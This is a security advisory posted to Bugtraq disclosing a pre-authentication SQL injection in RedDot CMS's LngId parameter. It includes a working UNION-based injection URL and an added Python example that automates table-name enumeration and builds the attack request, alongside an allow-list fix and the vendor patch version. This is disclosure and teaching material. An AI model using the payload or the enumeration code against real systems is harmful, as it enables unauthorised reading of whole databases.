Subject: IRM Security Advisory : RedDot CMS SQL injection vulnerability
Date: Mon, 21 Apr 2008 17:10:10 +0100
Message-ID: <7B01ACCEDD4FFE48B12A55E2DB16A9304CA8E4@dccheltenham.local.irmplc.com>
From: "Mark Crowther" <mark.crowther@irmplc.com>
To: <bugtraq@securityfocus.com>
RedDot CMS SQL injection vulnerability (CVE Number: CVE-2008-1613)
http://www.irmplc.com/index.php/167-Advisory-026
Vulnerability Type/Importance: SQL injection/Critical
Problem Discovered: 12 February 2008
Vendor Contacted: 19 February 2008
Advisory Published: 21 April 2008
Abstract:
The RedDot CMS product (http://www.reddot.com) contains a pre-authentication SQL injection vulnerability which, when exploited, allows an unauthenticated attacker to enumerate the entire content of the back-end database.
Description:
The 'LngId' parameter passed to IoRD.asp selects the language context for the CMS application. Its value is not adequately validated before it is used in a database query, so SQL supplied in this parameter is executed by the back-end database.
Technical Details:
Normal input for the 'LngId' parameter is a language code such as ENG, DEU or JP. Because the parameter is not properly validated, SQL appended to it is executed, giving an attacker unrestricted ability to enumerate information from the database. For example:
https://vulnerablehost.com:443/cms/ioRD.asp?Action=ShowMessage&LngId=ENG.DGC0 FROM IO_DGC_ENG UNION SELECT min(name) FROM SYSOBJECTS where xtype=char(85) and name> '' ORDER BY 1;-- &DisableAutoLogin=1
In this request the UNION appends a single row from SYSOBJECTS to the legitimate result: the lowest-sorting user table name (xtype 'U', written as char(85) so that no quote character is needed). Replacing the empty string in name> '' with the name just retrieved returns the next table in sort order, so repeating the request walks the whole catalog one name per response; the trailing ;-- discards the remainder of the original query. The same min()/greater-than walk can then be pointed at the columns and rows of each table found, which is how the entire database content becomes readable.
Proof of Concept:
A proof-of-concept script (RDdbenum.py) that automates enumeration of the entire database content is available from http://www.irmplc.com/Tools/RDdbenum.py
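The catalog walk described in the Technical Details and automated by RDdbenum.py, as an added example that is not part of the advisory and is not IRM's or RedDot's code. It assumes an in-memory SQLite database as a stand-in for SQL Server 2005, a hypothetical reconstruction of the IoRD.asp query (VULNERABLE_SQL, chosen only because the published payload parses when spliced into it; the real query text is not public), and constructed table names and messages. It also shows the allow-list check on LngId that the advisory's description implies was missing.

```python
"""Walks a database catalog through an injectable LngId parameter, the way the
advisory's payload does, and contrasts it with an allow-listed lookup.

Added example: this is not RDdbenum.py and not RedDot code. Assumptions:
  * SQLite stands in for SQL Server 2005 (both accept UNION, min(), char(85)
    and ORDER BY 1; SQL Server's SYSOBJECTS is recreated as a plain table).
  * VULNERABLE_SQL is a hypothetical reconstruction of IoRD.asp's query,
    chosen only because the published payload "ENG.DGC0 FROM IO_DGC_ENG ..."
    parses when spliced into it. The real query text is not public.
  * Table names and the 'Welcome' message are constructed sample data.
"""
import sqlite3
from urllib.parse import urlencode

# Hypothetical: the parameter is spliced into the query twice, as a table-name
# suffix. Everything after the attacker's "--" is a comment to end of line.
VULNERABLE_SQL = "SELECT IO_DGC_{lngid}.DGC0 FROM IO_DGC_{lngid}"

# Language codes the advisory names as normal input.
ALLOWED_LNGID = {"ENG", "DEU", "JP"}


def make_db() -> sqlite3.Connection:
    """Constructed stand-in schema: one language table plus a SYSOBJECTS catalog."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE IO_DGC_ENG (DGC0 TEXT)")
    db.execute("INSERT INTO IO_DGC_ENG VALUES ('Welcome')")
    # xtype 'U' = user table, 'P' = stored procedure (SQL Server convention)
    db.execute("CREATE TABLE SYSOBJECTS (name TEXT, xtype TEXT)")
    db.executemany(
        "INSERT INTO SYSOBJECTS VALUES (?, ?)",
        [("IO_DGC_ENG", "U"), ("IO_USER", "U"), ("IO_PROJECT", "U"), ("sp_helper", "P")],
    )
    db.commit()
    return db


def vulnerable_lookup(db: sqlite3.Connection, lngid: str) -> list:
    """String-concatenates LngId into the query: the flaw the advisory describes."""
    sql = VULNERABLE_SQL.format(lngid=lngid)
    return [row[0] for row in db.execute(sql)]


def is_valid_lngid(lngid: str) -> bool:
    """A table name cannot be a bind parameter, so an allow-list is the control."""
    return lngid in ALLOWED_LNGID


def hardened_lookup(db: sqlite3.Connection, lngid: str) -> list:
    """Same query, but the identifier is checked against the allow-list first."""
    if not is_valid_lngid(lngid):
        raise ValueError(f"LngId must be one of {sorted(ALLOWED_LNGID)}")
    sql = VULNERABLE_SQL.format(lngid=lngid)
    return [row[0] for row in db.execute(sql)]


def make_payload(last_name: str) -> str:
    """The advisory's LngId value, parameterised on the last table name seen.

    min(name) with name > '<last>' returns exactly the next user table in
    sort order, so repeating the request walks the whole catalog. char(85)
    is 'U' without needing a quote character. The advisory's string ends in
    ";--"; the ";" is dropped here because the SQLite stand-in runs one
    statement per call, and "--" alone discards the rest of the line.
    """
    return (
        "ENG.DGC0 FROM IO_DGC_ENG UNION SELECT min(name) FROM SYSOBJECTS "
        "WHERE xtype=char(85) AND name > '%s' ORDER BY 1--" % last_name
    )


def build_url(last_name: str, host: str = "vulnerablehost.com") -> str:
    """The request as it would be sent over HTTPS (host taken from the advisory's example)."""
    query = urlencode({"Action": "ShowMessage", "LngId": make_payload(last_name),
                       "DisableAutoLogin": "1"})
    return "https://%s:443/cms/ioRD.asp?%s" % (host, query)


def enumerate_user_tables(db: sqlite3.Connection, limit: int = 1000) -> list:
    """Drive the walk: diff each injected response against a clean baseline."""
    baseline = set(vulnerable_lookup(db, "ENG"))
    found = []
    last = ""
    while len(found) < limit:
        extra = set(vulnerable_lookup(db, make_payload(last))) - baseline
        extra.discard(None)  # min() over no remaining rows is NULL: catalog exhausted
        if not extra:
            break
        last = extra.pop()
        found.append(last)
    return found


if __name__ == "__main__":
    db = make_db()
    for name in enumerate_user_tables(db):
        print(name)
    print(build_url(""))
```

Against the constructed catalog the walk returns IO_DGC_ENG, IO_PROJECT and IO_USER in three requests and stops when min() yields NULL; the stored procedure is skipped by the xtype filter. The hardened lookup rejects the payload before any SQL is built, which is the fix an application must apply when the tainted value is an identifier rather than a bindable literal.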
Workaround / Solutions:
There are no known workarounds for this vulnerability.
The vendor has released a patch for this vulnerability, Release 7.5.1.86, available through normal RedDot customer support contacts.
Tested / Affected Versions:
IRM confirmed the presence of this vulnerability in RedDot CMS version 7.5 Build 7.5.0.48, tested with a Microsoft SQL Server 2005 database.
It is believed that this issue also exists in RedDot CMS versions 6.5 and 7.0; however, this has not been fully verified.
Credits:
Research and Advisory: Mark Crowther and Rodrigo Marcos
Disclaimer:
All information in this advisory is provided on an 'as is' basis in the hope that it will be useful. Information Risk Management Plc is not responsible for any risks or occurrences caused by the application of this information.